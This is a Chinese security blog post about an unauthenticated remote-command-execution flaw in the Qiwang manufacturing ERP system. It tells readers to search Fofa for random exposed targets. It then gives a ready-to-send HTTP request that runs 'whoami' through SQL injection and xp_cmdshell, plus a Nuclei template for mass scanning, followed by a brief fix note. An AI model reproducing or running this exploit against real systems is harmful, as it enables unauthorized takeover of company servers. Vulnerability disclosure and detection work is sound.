企望制造ERP系统 RCE漏洞

admin 2023年10月27日10:08:15评论359 views字数 1769阅读5分53秒阅读模式

漏洞概述

企望制造纸箱业erp系统由深知纸箱行业特点和业务流程的多位IT专家打造,具有国际先进的管理方式,将现代化的管理方式融入erp软件中,让企业分分钟就拥有科学的管理经验。erp的功能包括成本核算、报价定价、订单下达、生产下单、现场管理等多种功能。

由于企望制造 ERP comboxstore.action接口权限设置不当,默认的配置可执行任意SQL语句,利用xp_cmdshell函数可远程执行命令,未经认证的攻击者可通过该漏洞获取服务器权限。

漏洞复现

步骤一:使用以下语法到Fofa中搜索随机目标并拼接打开一下路径,若返回一下响应内容则可能存在漏洞

title="企望制造ERP系统"

企望制造ERP系统 RCE漏洞

步骤二:开启代理打开BP并修改请求数据包如下来利用 xp_cmdshell实现RCE验证漏洞是否存在...

POST /mainFunctions/comboxstore.action HTTP/1.1Host: IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: JSESSIONID=C6536EB9C115305D0E57D78F93823279Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 39
comboxsql=exec%20xp_cmdshell%20'whoami'

企望制造ERP系统 RCE漏洞

批量检测

id: qiwang-erp-comboxstore-rce
info:  name: qiwang-erp-comboxstore-rce  author: yy  severity: critical  description: SQL注入,可调用xp_cmdshell执行命令  tags: qiwang,erp,,sqli,rce  metadata:    fofa-qeury: title="企望制造ERP系统"    veified: true    max-request: 1
http:  - raw:      - |                      POST /mainFunctions/comboxstore.action HTTP/1.1        Host:         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Content-Type: application/x-www-form-urlencoded        Connection: close        Upgrade-Insecure-Requests: 1        Content-Length: 43
        comboxsql=exec%20xp_cmdshell%20'echo hello qiwang erp'                   matchers-condition: and    matchers:      - type: status        status:          - 200
      - type: word        words:          - 'hello'          - 'qiwang erp'        condition: and        part: body

修复建议

* 关闭互联网访问权限,将该接口设置权限认证(仅允许内部访问)* 尽快打补丁!

原文始发于微信公众号(揽月安全团队):企望制造ERP系统 RCE漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月27日10:08:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   企望制造ERP系统 RCE漏洞https://cn-sec.com/archives/2150767.html

发表评论

匿名网友 填写信息